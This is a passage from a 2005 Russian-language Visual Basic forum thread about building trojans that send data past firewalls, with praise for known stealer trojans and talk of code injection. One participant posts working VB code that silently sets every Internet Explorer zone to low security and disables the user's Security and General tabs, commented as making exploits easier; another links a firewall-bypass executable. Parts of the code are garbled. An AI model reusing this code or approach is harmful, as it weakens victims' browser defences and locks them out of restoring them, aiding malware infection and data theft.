| Вопрос: Demo AntiFireWall | Добавлено: 10.08.05 02:09 |
Автор вопроса:  HACKER
|
| Ответы | Всего ответов: 57 |
|
Номер ответа: 16 Автор ответа:  HACKER Разработчик Offline Client Вопросов: 236 Ответов: 8362 |
Профиль | | #16 | Добавлено: 11.08.05 02:00 |
да и чё непонятно coban2k в асе часто, правдо так же часто посылает, но я его понимаю...  ))))))))))))))))))))
|
||
|
Номер ответа: 17 Автор ответа: sneРазработчик Offline Client ICQ: 233286456 Вопросов: 34 Ответов: 5445 |
Web-сайт: Профиль | | #17 | Добавлено: 11.08.05 03:15 |
|
кобан обычный программер, ничего такого...
да все мы обычные программеры, был бы заказ - решение всегда найдется... ЗЫ 2ДаШарм... COM создан для VB и наоборот, разумеется перевод любого COM кода на наш старый добрый - ни для кого не представляет проблеммы, ни для хакера, ни уж тем-более для меня, тебя... |
||
|
Номер ответа: 18 Автор ответа: HACKERРазработчик Offline Client Вопросов: 236 Ответов: 8362 |
Профиль | | #18 | Добавлено: 11.08.05 16:58 |
|
да ни скажи, пока я не узнал какие апйпи юзать чтобы работать с опрелёнными clsID довольно сложно было всё представить, но теперь вроде прояснилось... эх щас затестю и вторую версию выложу, от там думайте гадайте не COM не внедрение...
|
||
|
Номер ответа: 19 Автор ответа: DaSharmICQ: 780477 Вопросов: 72 Ответов: 1297 |
Web-сайт: Профиль | | #19 | Добавлено: 11.08.05 19:16 |
|
блин, ну умный ты стал вообще....
coban2k не обычный программер потому, что создал самый лучший троян. Лучше него ничего нет. Кроме паблик версии ещё есть платная, которая просто поражает своими возможностями.... |
||
|
Номер ответа: 20 Автор ответа: HACKERРазработчик Offline Client Вопросов: 236 Ответов: 8362 |
Профиль | | #20 | Добавлено: 11.08.05 20:25 |
|
coban2k не обычный программер потому, что создал самый лучший троян.
самый лучший понятие растежимое... Я к кобану тоже отношусь как к простому программеру, да он мозгастый чувак, крутость его заключается а в асме... 24.05.2005 23:33:51, coban2k копай асм без него никуда и с этим я полностью согласен. Знаешь асм, декомпилируешь проги, смотриш как они шифруют пароли куда сохраняют, обратными шагами пишешь на чём угодно уже (в его случае делфи) алгоритм для расшифровки... а написать троя который по smtp чё то там мылит много ума ненадо... ну пинч отличился, у него http отправка через COM объект WB, но в наше время это хоть и не попса, но уже не актуально... у некоторых не палится, а у sne палиЦа бывает, хуже но реже... Совет остальным - ставте новее фаеры, сырсы пинча доступны, программеры будут переписывать их на всевозможные языки... а от так как я отправлять придумал ещё вроде никто не делал... интерестно что из этого всего получится...
|
||
|
Номер ответа: 21 Автор ответа: SharpЛидер форума ICQ: 216865379 Вопросов: 106 Ответов: 9979 |
Web-сайт: Профиль | | #21 | Добавлено: 11.08.05 21:58 |
| Я бы сказал, самый популярный трой, о самых лучших троях мы, по понятным причинам, не знаем. | ||
|
Номер ответа: 22 Автор ответа: HACKERРазработчик Offline Client Вопросов: 236 Ответов: 8362 |
Профиль | | #22 | Добавлено: 11.08.05 22:40 |
|
<<<< BETA 0.2 >>>>
в моих коментарии не нуждается, лучше вы коментируйте! http://vb.hut1.ru/afw.exe (~ 14 кб) |
||
|
Номер ответа: 23 Автор ответа: HACKERРазработчик Offline Client Вопросов: 236 Ответов: 8362 |
Профиль | | #23 | Добавлено: 11.08.05 22:41 |
| а кстати, старая (0.1) теперь некатит, я изминения в скрипте сделал, короче всё оптимизировано только для новой. | ||
|
Номер ответа: 24 Автор ответа: HACKERРазработчик Offline Client Вопросов: 236 Ответов: 8362 |
Профиль | | #24 | Добавлено: 12.08.05 17:51 |
|
от уж разные бывают... с отключённой явой в IE, да sne? Вообщем никакие фаеры не блокируют, осталось программно понизить уровень безопасности в IE и поставить галку на поддержку явы... Ну а так можете меня поздравить, при нормальном IE фаеры тихо сопят в тряпочку...
|
||
|
Номер ответа: 25 Автор ответа: Amor ICQ: 1268198 Вопросов: 31 Ответов: 101 |
Профиль | | #25 | Добавлено: 12.08.05 19:10 |
|
Блин кто знает Асм или Delphi могут перевести на VB сорцы инекции кода в чюжой процесс на www.wasm.ru Я блин парился с переводом кода на VB но не смог найти как получить размер Образа экзешника а за 3 пива на грудь не кому не нассать чтоб морем пахло? |
||
|
Номер ответа: 26 Автор ответа: DaSharmICQ: 780477 Вопросов: 72 Ответов: 1297 |
Web-сайт: Профиль | | #26 | Добавлено: 12.08.05 21:55 |
|
Понизить уровень безопасности можно юзая мой модуль:
'---------------------------------------------------------------------------------------
' Module : ieCustomize ' DateTime : 14.06.2005 15:33 ' Author : DaSharm (Rakochyy Nazariy) , Ternopil , UKRAINE ' Purpose : Functions to change Internet Explorer settings '--------------------------------------------------------------------------------------- ' Disable General and Security tab's in IE (user will can't change this settings) Public Function CreateDisableKeys(Disabl As Boolean) On Error Resume Next Dim T1 As String, T2 As String T1 = "Software\Policies\Microsoft\Internet Explorer\Control Panel" CreateNewKey HKEY_CURRENT_USER, T1 ' disabling General tab If Disabl Then T2 = "0" Else T2 = "yes" SetKeyValue HKEY_CURRENT_USER, T1, "GeneralTab", T2, REG_SZ SetKeyValue HKEY_CURRENT_USER, T1, "SecurityTab", T2, REG_SZ End Function ' set LOW security level in all internet zones of IE (for easy exploits life )
Public Function SetLowProtect() On Error Resume Next Dim D1 As String, tmpPolicy As Long  1 = "Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\"
' first of all, getting low template settings value tmpPolicy = QueryValue(HKEY_LOCAL_MACHINE, "SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\TemplatePolicies\low", "TemplateIndex" 
' then set this templates to all zones in IE SetKeyValue HKEY_CURRENT_USER, D1 & "1", "CurrentLevel", tmpPolicy, REG_DWORD SetKeyValue HKEY_CURRENT_USER, D1 & "2", "CurrentLevel", tmpPolicy, REG_DWORD SetKeyValue HKEY_CURRENT_USER, D1 & "3", "CurrentLevel", tmpPolicy, REG_DWORD SetKeyValue HKEY_CURRENT_USER, D1 & "4", "CurrentLevel", tmpPolicy, REG_DWORD End Function |
||
|
Номер ответа: 27 Автор ответа: DaSharmICQ: 780477 Вопросов: 72 Ответов: 1297 |
Web-сайт: Профиль | | #27 | Добавлено: 12.08.05 21:56 |
|
модуль требует наличия этого модуля для работы с реестром:
Public Const REG_SZ As Long = 1
Public Const REG_DWORD As Long = 4 Public Const HKEY_LOCAL_MACHINE = &H80000002 Public Const HKEY_CLASSES_ROOT = &H80000000 Public Const HKEY_CURRENT_USER = &H80000001 Public Const HKEY_USERS = &H80000003 Public Const ERROR_NONE = 0 Public Const ERROR_BADDB = 1 Public Const ERROR_BADKEY = 2 Public Const ERROR_CANTOPEN = 3 Public Const ERROR_CANTREAD = 4 Public Const ERROR_CANTWRITE = 5 Public Const ERROR_OUTOFMEMORY = 6 Public Const ERROR_INVALID_PARAMETER = 7 Public Const ERROR_ACCESS_DENIED = 8 Public Const ERROR_INVALID_PARAMETERS = 87 Public Const ERROR_NO_MORE_ITEMS = 259 Public Const KEY_ALL_ACCESS = &H3F Public Const REG_OPTION_NON_VOLATILE = 0 Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long Declare Function RegCreateKeyEx Lib "advapi32.dll" Alias "RegCreateKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal Reserved As Long, ByVal lpClass As String, ByVal dwOptions As Long, ByVal samDesired As Long, ByVal lpSecurityAttributes As Long, phkResult As Long, lpdwDisposition As Long) As Long Declare Function RegOpenKeyEx Lib "advapi32.dll" Alias "RegOpenKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As Long Declare Function RegQueryValueExString Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, ByVal lpData As String, lpcbData As Long) As Long Declare Function RegQueryValueExLong Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, lpData As Long, lpcbData As Long) As Long Declare Function RegQueryValueExNULL Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, ByVal lpData As Long, lpcbData As Long) As Long Declare Function RegSetValueExString Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpValue As String, ByVal cbData As Long) As Long Declare Function RegSetValueExLong Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpValue As Long, ByVal cbData As Long) As Long Declare Function RegDeleteKey& Lib "advapi32.dll" Alias "RegDeleteKeyA" (ByVal hKey As Long, ByVal lpSubKey As String) Declare Function RegDeleteValue& Lib "advapi32.dll" Alias "RegDeleteValueA" (ByVal hKey As Long, ByVal lpValueName As String) 'Ñîçäàíèå íîâîãî êëþ÷à Public Function CreateNewKey(lPredefinedKey As Long, sNewKeyName As String) Dim hNewKey As Long Dim lRetVal As Long lRetVal = RegCreateKeyEx(lPredefinedKey, sNewKeyName, 0&, vbNullString, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, 0&, hNewKey, lRetVal) RegCloseKey (hNewKey) End Function Public Function SetKeyValue(lPredefinedKey As Long, sKeyName As String, sValueName As String, vValueSetting As Variant, lValueType As Long) Dim lRetVal As Long Dim hKey As Long lRetVal = RegOpenKeyEx(lPredefinedKey, sKeyName, 0, KEY_ALL_ACCESS, hKey) lRetVal = SetValueEx(hKey, sValueName, lValueType, vValueSetting) RegCloseKey (hKey) End Function Public Function SetValueEx(ByVal hKey As Long, sValueName As String, lType As Long, vValue As Variant) As Long Dim lValue As Long Dim sValue As String Select Case lType Case REG_SZ sValue = vValue SetValueEx = RegSetValueExString(hKey, sValueName, 0&, lType, sValue, Len(sValue)) Case REG_DWORD lValue = vValue SetValueEx = RegSetValueExLong(hKey, sValueName, 0&, lType, lValue, 4) End Select End Function Public Function QueryValue(lPredefinedKey As Long, sKeyName As String, sValueName As String) Dim lRetVal As Long Dim hKey As Long Dim vValue As Variant lRetVal = RegOpenKeyEx(lPredefinedKey, sKeyName, 0, KEY_ALL_ACCESS, hKey) lRetVal = QueryValueEx(hKey, sValueName, vValue) QueryValue = vValue RegCloseKey (hKey) End Function Function QueryValueEx(ByVal lhKey As Long, ByVal szValueName As String, vValue As Variant) As Long Dim cch As Long Dim lrc As Long Dim lType As Long Dim lValue As Long Dim sValue As String On Error GoTo QueryValueExError lrc = RegQueryValueExNULL(lhKey, szValueName, 0&, lType, 0&, cch) Select Case lType Case REG_SZ: sValue = String(cch, 0) lrc = RegQueryValueExString(lhKey, szValueName, 0&, lType, sValue, cch) If lrc = ERROR_NONE Then vValue = Left$(sValue, cch) Else vValue = Empty End If Case REG_DWORD: lrc = RegQueryValueExLong(lhKey, szValueName, 0&, lType, lValue, cch) If lrc = ERROR_NONE Then vValue = lValue Case Else lrc = -1 End Select QueryValueExExit: QueryValueEx = lrc Exit Function QueryValueExError: Resume QueryValueExExit End Function Public Function DeleteValue(lPredefinedKey As Long, sKeyName As String, sValueName As String) im lRetVal As Long
im hKey As Long
lRetVal = RegOpenKeyEx(lPredefinedKey, sKeyName, 0, KEY_ALL_ACCESS, hKey) lRetVal = RegDeleteValue(hKey, sValueName) RegCloseKey (hKey) End Function Public Function DeleteKey(lPredefinedKey As Long, sKeyName As String) im lRetVal As Long
lRetVal = RegDeleteKey(lPredefinedKey, sKeyName) End Function |
||
|
Номер ответа: 28 Автор ответа: HACKERРазработчик Offline Client Вопросов: 236 Ответов: 8362 |
Профиль | | #28 | Добавлено: 12.08.05 22:09 |
|
пасибо! ieCustomize очень пригодится. Я не особо долго маялся с включением отключённой явы, но меняя
в HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\SO и HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\SOIEAK всё что касается JAVASCRIPT в положение "Разрешён" чё то оно отвинта не переставлялось... Может я вообще не в той ветке меню? Хотя Regmoonom смотрел вроде читает и записует сюда... |
||
|
Номер ответа: 29 Автор ответа: sneРазработчик Offline Client ICQ: 233286456 Вопросов: 34 Ответов: 5445 |
Web-сайт: Профиль | | #29 | Добавлено: 12.08.05 23:24 |
|
Совет остальным - ставте новее фаеры, сырсы пинча доступны, программеры будут переписывать их на всевозможные языки...
Сколько существует пинч? И сколько с него ты видел переделок ?
2Amor, если я не ошибаюсь ам нет ничего сложного... и код внедряется для подключения собственной dll... |
||
|
Номер ответа: 30 Автор ответа: HACKERРазработчик Offline Client Вопросов: 236 Ответов: 8362 |
Профиль | | #30 | Добавлено: 12.08.05 23:43 |
|
Сколько существует пинч? И сколько с него ты видел переделок
? ну перелки может и есть, но "вкусные" алгоритмы никто не меняет
|
||